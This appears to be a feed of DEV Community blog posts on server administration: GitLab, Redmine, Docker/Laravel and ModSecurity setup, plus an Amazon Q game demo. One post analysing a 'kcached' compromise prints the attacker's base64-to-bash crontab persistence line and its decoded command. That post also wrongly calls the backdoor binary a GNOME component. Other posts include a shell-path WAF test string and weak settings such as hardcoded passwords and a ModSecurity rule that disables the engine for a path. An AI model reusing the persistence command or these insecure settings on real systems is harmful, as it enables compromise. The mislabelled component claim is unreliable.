DEV Community: Henri Sekeladi

Build a game using Amazon Q CLI - 2048 Game

Henri Sekeladi — Thu, 22 May 2025 08:24:18 +0000

“Build Games with Amazon Q CLI” campaign is all about getting hands-on experience with an AI coding assistant and letting your creativity and imagination bring a new game to reality using Amazon Q CLI, at our own time and at our own phase.

Step 1 : create an AWS Builder ID and claim our unique community.aws username.

You can access from this link.

Step 2 : install Amazon Q on our machine.

In this case, i am using macbook as base OS.

Install Homebrew if not installed

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Install Amazon Q CLI

brew install amazon-q

but, after installation finished, i can't access amazon q cli with command by type q on my terminal. Turn out that the application already in my Applications folder. Double click to open the GUI of amazon q or use Spotlight.

First time we open Amazon Q GUI

Setup Shell Integrations, click Install

Allow Acccesibility on Our machine

Amazon Q CLI available on my terminal after close and open the terminal

We successfully install and setup Amazon Q CLI. Now we need to login with our Builder ID.

We will redirect to browser access to login and allow access

Access granted

Successfully login with AWS Builder ID

Step 3 : Install Python and PyGame Library

Install Python

brew install python3

Install PyGame python library with pip

pip install pygame

Step 4 : Play with Amazon Q CLI

Check Amazon Q cli with type q on terminal.
First, i ask the Q can he make me a game. Then ask for game 2048.

He successfully created game, add some descryption and give the instruction how to run the game.

This is the game result.

I ask the Q to rewrite some modification on color looks of the 2048 game.

He gave the result and add some descryption.

This the result game.

And the Game Over game.

Also asking to add some functionality to the game.

Amazon Q successfully response with some information about the game functionality.

This is the end of game result.

This is it!.. My first experience on Amazon Q CLI on my MacOS.

Hope this article useful for you.

Installing GitLab Runner on Ubuntu Server 24.04

Henri Sekeladi — Wed, 09 Oct 2024 03:41:28 +0000

In this article we will install gitlab runner on ubuntu server 24.04 hosted on EC2 Instance of AWS.

First, update the ubuntu package

sudo apt update

Install gitlab runner

We need to install repository gitlab runner from gitlab.com

curl -L "https://packages.gitlab.com/install/repositories/runner/gitlab-runner/script.deb.sh" | sudo bash

Install the gitlab runner

sudo apt-get install gitlab-runner

Register gitlab runner

We share article about installing gitlab ce on this post.

This article set the gitlab runner on the instance level, so every project will run the job with this runner.

To register gitlab runner, we need to add runner via Gitlab Admin. Insert the Tags to math the tag of project or we can check the Run untagged jobs to run every project on this instance (hence, we set the runner on the instance level).

Run the code provided on this picture to our gitlab runner server.

List of Runner that work is green

Upgrade GitLab Runner

sudo apt-get update
sudo apt-get install gitlab-runner

That's it.

Hopefully this article helps you!

Install Gitlab CE on Ubuntu Server 24.04

Henri Sekeladi — Wed, 09 Oct 2024 02:21:17 +0000

In this article we use EC2 instance on AWS with Ubuntu 24.04 Server.

First, update our ubuntu package

sudo apt update

Next, install some libraries that we need.

sudo apt install ca-certificates curl openssh-server postfix tzdata perl

Install Gitlab CE

Move to directory /tmp

cd /tmp

Get the repository for gitlab ce

curl -LO https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh

Run the bash script

sudo bash /tmp/script.deb.sh

Lastly, install the gitlab ce

sudo apt install gitlab-ce

Setup firewall

Check the status of UFW

sudo ufw status

Add some rules to allow http, https and OpenSSH

sudo ufw allow http
sudo ufw allow https
sudo ufw allow OpenSSH

Check the ufw status again

sudo ufw status

Editing the Gitlab configuration

Edit the gitlab configuration in

sudo nano /etc/gitlab/gitlab.rb

Edit this 2 below below to get domain name and ssl certificate from letsencrypt.

external_url 'https://gitlab.withenri.tech'
letsencrypt['contact_emails'] = ['studio@withenri.tech']

save the configuration with ctrl + x, choose Yes and Enter.

Lastly, run the gitlab-ctl to configure gitlab

sudo gitlab-ctl reconfigure

Just wait, the process will take times. If there is no error, we can access our gitlab instance with the domain name.

Root Password Gitlab

The default user for Administrator is root with password in

sudo cat /etc/gitlab/initial_root_password

this file will deleted in 24 our after installation of gitlab.

Administrator UI

Access our instance with domain name (https://gitlab.withenri.tech).
Enter username with root and password from /etc/gitlab/initial_root_password.

Change the root password with click profile picture, choose edit profile and choose Password.

That's it.

Hopefully this article helps you!

Setup Redmine on Docker Container

Henri Sekeladi — Thu, 19 Sep 2024 01:55:17 +0000

Redmine is a flexible and open-source project management and issue-tracking web application. It is widely used for managing projects, tracking bugs, and handling tasks and deadlines. Developed using Ruby on Rails, Redmine is highly customizable and supports a wide range of features for team collaboration and project organization.

Redmine is a popular alternative to commercial project management tools due to its flexibility, customization, and open-source nature.

In this article we will setup redmine on docker container along with database server, mysql and also nginx as reverse proxy.

Install Docker

We use ubuntu server hosted on AWS EC2 and installation guide from docker official.

# Add Docker's official GPG key:
sudo apt-get update
sudo apt-get install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc

# Add the repository to Apt sources:
echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
  $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update

We use the latest version of docker along with docker compose.

sudo apt-get install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

Ok, docker installed, next we need to configure our user (ubuntu) can access docker directly without sudo.

sudo groupadd docker
sudo usermod -aG docker $USER

and then logout and login again to our server. Docker is ready!
We can use this command below to start docker container when our server restart.

sudo systemctl enable docker.service
sudo systemctl enable containerd.service

docker container is enough for right now.

Create docker compose file

We will create one docker compose file.

nano docker-compose.yaml

and paste this yaml code.

version: '3.1'

services:
  nginx:
    # we use the latest of nginx as base
    image: nginx:latest
    restart: always
    # we expose port 80 and 443 to the public as our reverse proxy
    ports:
      - "80:80"
      - "443:443"
    volumes:
      # we link volume from host for nginx configuration
      - './nginx.conf:/etc/nginx/conf.d/nginx.conf'
      # we link volume from host for nginx certs
      - './certs:/etc/nginx/certs'
      # we link also timezone from the host
      - '/etc/localtime:/etc/localtime:ro'
      - '/etc/timezone:/etc/timezone:ro'
    depends_on:
      # we will wait until server redmine is ready
      - redmine
  redmine:
    # we use redmine from dockerhub as base
    image: redmine
    restart: always
    volumes:
      # we link redmine data to our local storage, so it will persistent when
      # the service redmine restarted
      - 'redmine_data:/usr/src/redmine/files'
      # we link redmine plugin also from the host
      - '/home/bkn/redmine_plugins:/usr/src/redmine/plugins'
      # we link also timezone from the host
      - '/etc/localtime:/etc/localtime:ro'
      - '/etc/timezone:/etc/timezone:ro'
    # we don't expose port on this service because nginx service will do
    # default port redmine expose internally is 3000
    #ports:
      #- 3000:3000
      #- 444:3000
    environment:
      # we create some env for redmine
      REDMINE_DB_MYSQL: db
      REDMINE_DB_PORT: 3306
      REDMINE_DB_DATABASE: redmine_db
      REDMINE_DB_USERNAME: redmine
      REDMINE_DB_PASSWORD: my_p@ssword
      REDMINE_SECRET_KEY_BASE: G75eddsecretkey
    # we will wait until db service is ready
    depends_on:
      - db
  db:
    # we use mysql server for redmine database
    image: mysql:8.0
    restart: always
    volumes:
      # we also link the database storage with volume we created below
      - 'mysql_data:/var/lib/mysql'
    environment:
      # we create some env for mysql
      MYSQL_USER: redmine
      MYSQL_PASSWORD: my_p@ssword
      MYSQL_RANDOM_ROOT_PASSWORD: 1
      MYSQL_ROOT_PASSWORD: JRFFHT534rth4u3!@#
      MYSQL_DATABASE: redmine_db

volumes:
  # we create two volume used by redmine and our database
  mysql_data:
    driver: local
  redmine_data:
    driver: local

next, we create nginx configuration file, same folder as docker-compose file

nano nginx/nginx.conf

server {
        listen 80;
        server_name proman.withenri.tech;
        location / {
            proxy_pass http://henri_redmine_1:3000;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
        }
    }
server {
        listen 443 ssl;
        server_name proman.withenri.tech;
        ssl_certificate /etc/nginx/certs/withenri.tech_chained.crt;
        ssl_certificate_key /etc/nginx/certs/withenri.tech.key;
        location / {
            proxy_pass http://henri_redmine_1:3000;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
        }
    }

and create folder called certs then place our certificates right there.

Create container

let's run our docker compose file with command

docker-compose up -d

when we run this docker compose file, a network will created automatically and link three services (nginx, redmine, db) in those one network.

we can check our container with command :

docker ps -a

and then test redmine application on our browser with port 80 and port 443 with https connection. use user 'admin' and password 'admin' for login on our redmine application.

this article basically has same result when we installed on vps directly, refer to this article.

Hopefully this article helps you!

Dockerfile for PHP Laravel

Henri Sekeladi — Wed, 18 Sep 2024 04:05:49 +0000

In this article we will create an Image of Docker Container for Laravel application. In the main folder of laravel, we created a folder called docker. Inside that folder we created some file configuration. In this case we use postgreSQL as database server.

Let's begin..

Dockerfile

Dockerfile located on the main laravel project. We used debian bullseye as base image.

# basic container
FROM php:8.3-fpm-bullseye

# setup user as root
USER root

# set working directory
WORKDIR /var/www

# install postgresql client 15
RUN apt-get update \
    && apt-get -y install gnupg2 lsb-release wget curl \
    && sh -c 'echo "deb http://apt.postgresql.org/pub/repos/apt $(lsb_release -cs)-pgdg main" > /etc/apt/sources.list.d/pgdg.list' \
    && wget --quiet -O - https://www.postgresql.org/media/keys/ACCC4CF8.asc | apt-key add - \
    && apt-get update

# install supervisor, postgresql libs and other libs of php
RUN apt-get install -y net-tools supervisor nginx -y \
    && apt-get install -y libpq-dev libgmp-dev \
    && apt-get install -y --no-install-recommends postgresql-client \
    # gd
    && apt-get install -y libzip-dev zlib1g-dev libpng-dev \
    && docker-php-ext-configure gd  \
    && docker-php-ext-install gd \
    && docker-php-ext-install gmp \
    # Install Postgre PDO
    && docker-php-ext-configure pgsql -with-pgsql=/usr/local/pgsql \
    && docker-php-ext-install pdo pdo_pgsql pgsql \
    # option for install mysql as database
    # && docker-php-ext-install mysqli \
    # && docker-php-ext-enable mysqli \
    # opcache
    && docker-php-ext-enable opcache \
    # exif
    && docker-php-ext-install exif \
    && docker-php-ext-install sockets \
    && docker-php-ext-install pcntl \
    && docker-php-ext-install bcmath \
    # zip
    && docker-php-ext-install zip \
    # clean repo
    && apt-get autoclean -y \
    && rm -rf /var/lib/apt/lists/* \
    && rm -rf /tmp/pear/

# copy files of laravel
COPY . /var/www

# copy configuration of php, nginx and php-fpm
COPY ./docker/local.ini /usr/local/etc/php/local.ini
COPY ./docker/nginx.conf /etc/nginx/nginx.conf
COPY ./docker/www.conf /usr/local/etc/php-fpm.d/www.conf

# create log files
RUN touch /var/www/storage/logs/schedule.log
RUN touch /var/www/storage/logs/queue.log

# copy supervisor configuration
COPY ./docker/supervisord.conf /etc/supervisor/conf.d/

# setup composer and laravel
RUN curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer
RUN composer install --working-dir="/var/www"

# change level security of openssl
RUN sed -i 's/SECLEVEL=2/SECLEVEL=1/g' /etc/ssl/openssl.cnf

# generate passport keys if needed
#RUN php artisan passport:keys

#export port of the application
EXPOSE 80

# set permission on laravel directory
RUN chmod +rwx /var/www
RUN chown -R www-data:www-data /var/www/storage
RUN chown -R www-data:www-data /var/www/bootstrap
RUN chmod -R 775 /var/www/storage
RUN chmod -R 775 /var/www/bootstrap

RUN ["chmod", "+x", "docker/post_deploy.sh"]
CMD [ "sh", "docker/post_deploy.sh" ]

local.ini

located on docker folder. Reconfigure upload_max_filesize and some other value, included memory_limit.

upload_max_filesize=40M
post_max_size=40M
max_execution_time=180
memory_limit=-1
date.timezone = "Asia/Jakarta"
expose_php = off

nginx.conf

located on docker folder. We setup one serverblock as default nginx virtualhost.

user root;
worker_processes  auto;

events {
    worker_connections  1024;
}

http {
    access_log    /dev/stdout;
    include       mime.types;
    default_type  application/octet-stream;

    server {
        # we use port 80 here to work with our docker config but you can configure it to any port you want, just remember to update the dockerfile accordingly
        listen 80;

        index index.php index.html;

        # your application here
        server_name app;

        error_log  /var/log/nginx/error.log;

        access_log /var/log/nginx/access.log;

        add_header X-Frame-Options "SAMEORIGIN" always;
        server_tokens off;
        add_header Strict-Transport-Security "max-age=31536000; includeSubdomains; preload";
        add_header X-XSS-Protection "1; mode=block";
        add_header Content-Security-Policy "default-src 'self' http: https: data: blob: 'unsafe-inline'" always;

        # this should be the path of your public folder in laravel which from our dockerfile it would be /var/www/public
        root /var/www/public;

        location ~ \.php$ {
         try_files $uri =404;
         fastcgi_split_path_info ^(.+\.php)(/.+)$;
               fastcgi_pass 127.0.0.1:9000;
               fastcgi_index index.php;
               include fastcgi_params;
               fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
               fastcgi_param PATH_INFO $fastcgi_path_info;
               fastcgi_buffering off;
        }

        location / {
         try_files $uri $uri/ /index.php?$query_string;
               gzip_static on;
        }
  }
}

supervisord.conf

located on docker folder. We included supervisor configuration to run our queue on laravel application.

[program:schedule-run]
process_name=%(program_name)s_%(process_num)02d
command=/bin/bash -c "while [ true ]; do (php /var/www/artisan schedule:run --verbose --no-interaction &); sleep 60; done"
autostart=true
autorestart=true
user=www-data
numprocs=1
redirect_stderr=true
stdout_logfile=/var/www/storage/logs/schedule.log
stopwaitsecs=60

[program:test-01-worker]
process_name=%(program_name)s_%(process_num)02d
command=php /var/www/artisan queue:work --queue=listener,default --tries=10
autostart=true
autorestart=true
user=www-data
numprocs=2
redirect_stderr=true
stdout_logfile=/var/www/storage/logs/queue.log

www.conf

located on docker folder. We also reconfigure php-fpm configuration.

[www]
user = www-data
group = www-data
listen = 127.0.0.1:9000

pm = static
pm.max_children = 300
pm.start_servers = 40
pm.min_spare_servers = 20
pm.max_spare_servers = 60
pm.max_requests = 500

post_deploy.sh

located on docker folder. We run supervisor, php-fpm and nginx on this script.

#!/bin/sh

# update application cache
php artisan optimize

# start the application
supervisord -c  "/etc/supervisor/supervisord.conf" && php-fpm -D &&  nginx -g "daemon off;"

Build the Image

docker build .

OR with tag

docker build -t sampleapp:v1 .

Run a Container

docker container run -d -p 8080:80 [docker_image]
docker container run -d -p 8080:80 sampleapp:v1

Hopefully this article helps you!

How to deal with malicious kcached processes

Henri Sekeladi — Tue, 10 Sep 2024 02:06:53 +0000

https://alltime.pp.ua/blog/how-to-deal-with-malicious-kcached-processes/

If you find something like below on your server, be sure you’ve detected malicious activity.

username 2156075 0.0 0.0 2848 2660 ? Ss Feb09 0:00 [kcached]
username 2156076 0.0 0.0 2852 2660 ? S Feb09 0:01 \_ [kcached]

You can use the lsof command to determine which processes have the files open and whether they are being used for legitimate purposes. If you are unsure about the legitimacy of these files or the processes using them, it may be helpful to consult with a qualified system administrator or security expert.

root@server1 [~]# lsof -p 2156075

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
gs-dbus 2156075 username cwd DIR 253,1 4096 125184743 /home/username
gs-dbus 2156075 username rtd DIR 253,1 4096 211550638 /
gs-dbus 2156075 username txt REG 253,1 1118516 125174637 /home/username/.config/dbus/gs-dbus

Here you go:

ls -1 /home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus.dat

The files you see appear to be related to the gs-dbus process, which is a component of the GNOME software suite that manages D-Bus connections for graphical applications. The files in question are likely configuration files and data files used by this process.

It is not uncommon for these types of files to be owned by a user, especially if they are related to user-specific settings or configurations.

Inspect crontab of the given user:

root@server1 [~]# crontab -lu username

# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel

If you decode the base64 line you will see more:

/usr/bin/pkill -0 -U2438 gs-dbus 2>/dev/null || SHELL=/usr/local/cpanel/bin/noshell TERM=xterm-256color GS_ARGS="-k /home/username/.config/dbus/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/username/.config/dbus/gs-dbus'" 2>/dev/null

Recommendations:

– Don’t ignore the case
– kill the processes
– remove the files
– remove the cron
– reset all passwords for affected user
– scan account additionally using some good scanner
– notify the client

How to Install Redmine with MySQL on Ubuntu 24.04

Henri Sekeladi — Tue, 10 Sep 2024 02:04:08 +0000

Redmine is a popular alternative to commercial project management tools due to its flexibility, customization, and open-source nature.

In this article we will install Redmine on VPS hosted on AWS EC2 Instance with MySQL as database server.

Connect to Server

We can connect to server with SSH Client installed on my machine with Termius.

from CLI, we can use :

ssh ubuntu -i private_key.pem ubuntu@ip_address_server

then we can check our OS detail.

# cat /etc/os-release

before we installed any tools, we need to update our server.

# apt update

Install dependencies.

First, we need to install some libraries and tools to support our installation.

# apt install build-essential ruby-dev libxslt1-dev libmariadb-dev gnupg2 bison libbison-dev libgdbm-dev libncurses-dev libncurses5-dev libxml2-dev zlib1g-dev imagemagick libmagickwand-dev libreadline-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3

Create Redmine User

We will create a new system user in this stage named “redmine.” To manage redmine application.

# useradd -r -m -d /opt/redmine -s /bin/bash redmine

Option /opt/redmine as its home directory, the command will create the user “redmine,” who should be able to execute shell commands. Additionally, we must set user www-data, the user of our web server, in our Redmine group.

# usermod -aG redmine www-data

Install Passenger and Nginx Webserver

We will install Nginx as webserver for our redmine application.

# apt install nginx
# service nginx start
# systemctl enable nginx

after we installed nginx, we neet to install passenger as webserver for ruby application.

# apt install -y dirmngr gnupg apt-transport-https ca-certificates curl
# curl https://oss-binaries.phusionpassenger.com/auto-software-signing-gpg-key.txt | gpg --dearmor | tee /etc/apt/trusted.gpg.d/phusion.gpg >/dev/null
# sh -c 'echo deb https://oss-binaries.phusionpassenger.com/apt/passenger noble main > /etc/apt/sources.list.d/passenger.list'

then we update our packages and install module nginx with passenger

# apt update

# apt install libnginx-mod-http-passenger -y

lastly, restart our nginx server.

# systemctl restart nginx

Create virtualhost/ nginx server block

We will create a virtual host in nginx configuration with domain name on it. In this case we use Route 53 from AWS to set our domain.

# nano /etc/nginx/conf.d/redmine.withenri.tech.conf

Insert this text below to our virtualhost.

server {
listen 80;
server_name redmine.withenri.tech;

root /opt/redmine/public;

access_log /var/log/nginx/your_domain.com.access.log;
error_log /var/log/nginx/your_domain.com.error.log;

passenger_enabled on;
passenger_min_instances 1;
client_max_body_size 10m;
}

Save the file and exit from the nano editor. (ctrl + x then hit Enter)

Restart our nginx server, after virtualhost configuration.

systemctl restart nginx

Install MySQL Database

Next, we will install MySQL database server as storage data for our redmine application

sudo apt install mysql-server -y

Enable our database when server up.

systemctl enable mysql

and then start our database server.

systemctl start mysql

then login to our database with command.

sudo mysql

run command below to create database, user and add privileges.

mysql> CREATE DATABASE redminedb;
mysql> CREATE USER 'redmineuser'@'localhost' IDENTIFIED BY 'my_password';
mysql> GRANT ALL PRIVILEGES ON redminedb.* TO 'redmineuser'@'localhost';
mysql> FLUSH PRIVILEGES;
mysql> Exit

Setup Redmine Application

It is time to setup our redmine application code on our server. First, we need to download the source code.

wget https://www.redmine.org/releases/redmine-5.1.3.tar.gz

tar -xzvf redmine-5.0.5.tar.gz -C /opt/redmine/ --strip-components=1

chown -R redmine: /opt/redmine/

Let’s now move to the user “redmine.”

# su - redmine

Next, we duplicate and rename some configuration.

$ cp -a /opt/redmine/config/configuration.yml{.example,}

$ cp -a /opt/redmine/config/database.yml{.example,}

$ cp -a /opt/redmine/public/dispatch.fcgi{.example,}

After the configuration copied, we change our database configuration.

$ nano /opt/redmine/config/database.yml

don't forget to save the new database configuration. Press ctl + x and the hit Enter.

Now we need to exit from user 'redmine'.

$ exit

We back as root user.

run this command to install bundler.

cd /opt/redmine && gem install bundler

Now we back again as user redmine

# su - redmine

Next, we proceed with installation process.

$ bundle config set --local path 'vendor/bundle'

$ bundle install

$ bundle update

then generate key and database migration

bundle exec rake generate_secret_token

RAILS_ENV=production bundle exec rake db:migrate

We can add default configuration data to the database when the database conversion is complete:

RAILS_ENV=production REDMINE_LANG=en bundle exec rake redmine:load_default_data

the we exit as user 'redmine'.

$ exit

Now, let’s update the gem.

# gem update

this update will take times.

Then we can access our redmine server with http://public_ip_address.

Default admin username and password is admin.

Hope this article help you!

Whitelisting Specific Paths on Modsecurity 3 with OWASP Rules

Henri Sekeladi — Tue, 28 May 2024 01:28:13 +0000

Modsecurity with rule from OWASP rule set, make security very strict, sometimes modsecurity flag false positive in content that we post in form.

To whitelist the spesific path, we can add on modsecurity.conf to whitelist those path or spesific url.

We are on ubuntu server 22.04 with nginx and modsecurity installed and owasp rule in /etc/nginx/conf/owasp-crs/.

sudo nano /etc/nginx/conf/owasp-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf

and add this line in the bottom of the file

SecRule REQUEST_URI "@beginsWith /ptickets" "id:932130,phase:1,log,allow,ctl:ruleEngine=off

This mean :

Request URI begin with /ptickets will be ignored in modsecurity with rule id is 932130. Rule id 932130 is rule on OWASP for prevent Remote Code Execution on our website and it's need to be unique.

Don't forget to reload our nginx server to take effect :

sudo service nginx reload

Thank you very much, hope this post is useful and give us some love!

Install Nginx with Modsecurity + OWASP CRS on Centos 7

Henri Sekeladi — Tue, 28 May 2024 01:13:38 +0000

Update Package & Install Libraries

First, update the package and install some libraries that we need.

sudo yum update

sudo yum groupinstall 'Development Tools' -y
sudo yum install epel-release -y

yum install yajl yajl-devel curl-devel GeoIP-devel zlib-devel lmdb lmdb-devel libxml2-devel ssdeep ssdeep-devel lua-devel pcre-devel wget nano

When we build with this library installed, we got error, to prevent this error g++: error: unrecognized command line option '-std=c++17' , we need to install latest env for gcc :

# 1. Install a package with repository for your system:
# On CentOS, install package centos-release-scl available in CentOS repository:
$ sudo yum install centos-release-scl -y

# On RHEL, enable RHSCL repository for you system:
$ sudo yum-config-manager --enable rhel-server-rhscl-7-rpms

# 2. Install the collection:
$ sudo yum install devtoolset-8 -y

# 3. Start using software collections:
$ scl enable devtoolset-8 bash

Install Modsecurity

cd /opt && sudo git clone https://github.com/owasp-modsecurity/ModSecurity.git
cd ModSecurity
sudo git submodule init
sudo git submodule update
sudo ./build.sh
sudo ./configure
sudo make
sudo make install

Modsecurity-nginx

Download modsecurity-nginx connector

cd /opt && sudo git clone https://github.com/owasp-modsecurity/ModSecurity-nginx.git

We will need this when we configure nginx with modsecurity module later.

Install Nginx with latest version

First, we need to make repository list for nginx :

sudo nano /etc/yum.repos.d/nginx.repo

[nginx-stable]
name=nginx stable repo
baseurl=http://nginx.org/packages/centos/$releasever/$basearch/
gpgcheck=1
enabled=1
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true

[nginx-mainline]
name=nginx mainline repo
baseurl=http://nginx.org/packages/mainline/centos/$releasever/$basearch/
gpgcheck=1
enabled=0
gpgkey=https://nginx.org/keys/nginx_signing.key
module_hotfixes=true

choose witch one to use (stable or mainline)

sudo yum-config-manager --enable nginx-mainline
or
sudo yum-config-manager --enable nginx-stable

sudo yum install nginx -y

Set enable on nginx to start when the server up/runing, start the nginx service and check the status of the nginx service.

sudo systemctl enable nginx
sudo systemctl start nginx
sudo systemctl status nginx

Download nginx source code

Download source code with the same version with currently installed on Centos 7.

cd /opt && sudo wget https://nginx.org/download/nginx-1.24.0.tar.gz
sudo tar -xzvf nginx-1.24.0.tar.gz
cd nginx-1.24.0

Then, we configure nginx with dynamic module, that is modsecurity, we added --add-dynamic-module=/opt/ModSecurity-nginx to make this happen.

sudo ./configure --with-compat --add-dynamic-module=/opt/ModSecurity-nginx
sudo make
sudo make modules

after successfully build the nginx from source with modsecurity then copy the module file to folder nginx modules.

sudo cp objs/ngx_http_modsecurity_module.so /etc/nginx/modules/

Enable ModSecurity in nginx.conf

Copy configuration from modsecurity source code to nginx :

sudo cp /opt/ModSecurity/modsecurity.conf-recommended /etc/nginx/modsecurity.conf

sudo cp /opt/ModSecurity/unicode.mapping /etc/nginx/unicode.mapping

Edit nginx main configuration to load modsecurity module :

sudo nano /etc/nginx/nginx.conf

add this line on main row on nginx configuration file :

load_module modules/ngx_http_modsecurity_module.so;

and, add this code inside http {} or inside your custom server block for spesific site/domain :

modsecurity on;
modsecurity_rules_file /etc/nginx/modsecurity.conf;

Edit Modsecurity config

Edit modsecurity configuration to active engine :

sudo nano /etc/nginx/modsecurity.conf

Search for SecRuleEngine and set to On.

SecRuleEngine On

save the configuration.

Update Rule with CORE RULE SET (CRS)

sudo git clone https://github.com/coreruleset/coreruleset.git /etc/nginx/owasp-crs

Rename file crs-setup :

sudo cp /etc/nginx/owasp-crs/crs-setup.conf{.example,}

Add crs rule of CRS to modsecurity.conf :

sudo nano /etc/nginx/modsecurity.conf

add this 2 lines on the bottom of the modsecurity.conf

Include owasp-crs/crs-setup.conf
Include owasp-crs/rules/*.conf

Then, check configuration of nginx again :

sudo nginx -t

if the configuration is ok/success then restart nginx service.

sudo service nginx restart

Test Modsecurity + Nginx with browser

Access to your server with browser or curl and add some shell code :

https://ip_address/as.php?s=/bin/bash

If everything working as expected, forbidden access will show, with code 403. this mean we have success deploy our nginx server with modsecurity module.

To view detail about those error, we can see the log file of the modsecurity.

sudo tail -f /var/log/modsec_audit.log
sudo tail -f /var/log/nginx/error.log

Hope this post help you secure your site even more.

Found this post useful, please give us some love!

Install Nginx with Modsecurity 3 + OWASP CRS on Ubuntu 22.04

Henri Sekeladi — Tue, 28 May 2024 01:13:08 +0000

Preface

In this article we a VPS hosted on AWS EC2 Instance installed with Ubuntu 22.04

Update Package & Install Libraries

First, update the package and install some libraries that we need on ubuntu server 22.04.

sudo apt update && sudo apt upgrade

Install libraries that needed for our installation process from source of modsecurity 3.

sudo apt install gcc make build-essential autoconf automake libtool libcurl4-openssl-dev liblua5.3-dev libfuzzy-dev ssdeep gettext pkg-config libgeoip-dev libyajl-dev doxygen libpcre++-dev libpcre2-16-0 libpcre2-dev libpcre2-posix3 zlib1g zlib1g-dev -y

Install Modsecurity

Next, we will install modsecurity from source.

cd /opt && sudo git clone https://github.com/owasp-modsecurity/ModSecurity.git
cd ModSecurity

sudo git submodule init
sudo git submodule update

sudo ./build.sh
sudo ./configure

sudo make
sudo make install

If we success with this installation, we make big move. go on.

Download Modsecurity-nginx Connector

Next, we download modsecurity nginx connector, we will use this later on.

cd /opt && sudo git clone https://github.com/owasp-modsecurity/ModSecurity-nginx.git

Install Nginx with latest from Ondrej PPA

Ok, we will install nginx from ondrej ppa, we got the latest version of nginx.

First, we need to add repository from ondrej and update our package.

sudo add-apt-repository ppa:ondrej/nginx -y
sudo apt update
sudo apt install nginx -y

We can enable with systemctl to start nginx when our server up

sudo systemctl enable nginx
sudo systemctl status nginx

We also need to check our nginx version, to match our nginx build manual later on.

sudo nginx -v
nginx version: nginx/1.25.4

Download nginx source code

We should download source code that match version on nginx we recently installed.

cd /opt && sudo wget https://nginx.org/download/nginx-1.25.4.tar.gz
sudo tar -xzvf nginx-1.25.4.tar.gz
cd nginx-1.25.4

after we download, extract and change directory to nginx source. we build nginx with module on modsecurity that we successfully installed above.

sudo ./configure --with-compat --add-dynamic-module=/opt/ModSecurity-nginx

sudo make
sudo make modules

Next, we copy the modules to nginx modules-enabled, also copy configuration of modsecurity and unicode.

sudo cp objs/ngx_http_modsecurity_module.so /etc/nginx/modules-enabled/

sudo cp /opt/ModSecurity/modsecurity.conf-recommended /etc/nginx/modsecurity.conf

sudo cp /opt/ModSecurity/unicode.mapping /etc/nginx/unicode.mapping

Enable ModSecurity in nginx.conf

Next, we edit configuration of nginx to load module of modsecurity

sudo nano /etc/nginx/nginx.conf

add this line to main configuration.

load_module /etc/nginx/modules-enabled/ngx_http_modsecurity_module.so;

then, we also need to modify the server block to activate modsecurity.

sudo nano /etc/nginx/sites-enabled/default

modsecurity on;
modsecurity_rules_file /etc/nginx/modsecurity.conf;

and also, edit /etc/nginx/modsecurity.conf to change SecRuleEngine to On.

sudo nano /etc/nginx/modsecurity.conf

SecRuleEngine On

after that we can our nginx configuration and restart nginx server

sudo nginx -t

sudo systemctl restart nginx

We can test the nginx server with browser on its public ip address.

Update Rule with CORE RULE SET (CRS)

Now, we need to download core rule set from owasp, owasp crs provide rule to check if the client request has malicious code or not.

We directly download owasp crs to nginx configuration directory.

sudo git clone https://github.com/coreruleset/coreruleset.git /etc/nginx/owasp-crs

then we copy the configuration.

sudo cp /etc/nginx/owasp-crs/crs-setup.conf{.example,}

and we need to update our modsecurity configuration to load owasp crs.

sudo nano /etc/nginx/modsecurity.conf

Include owasp-crs/crs-setup.conf
Include owasp-crs/rules/*.conf

last, we check nginx configuration,

sudo nginx -t

and restart nginx server.

sudo service nginx restart

Test Modsecurity + Nginx with browser
Try to access to your server and add some shell code on it :

https://ip_address/as.php?s=/bin/bash

If everything working as expected, forbidden access will show, with code 403. this mean we have success deploy our nginx server with modsecurity module.

To view detail about those error, we can see the log file of the modsecurity.

sudo tail -f /var/log/modsec_audit.log
sudo tail -f /var/log/nginx/error.log

Hope this post help you secure your site even more.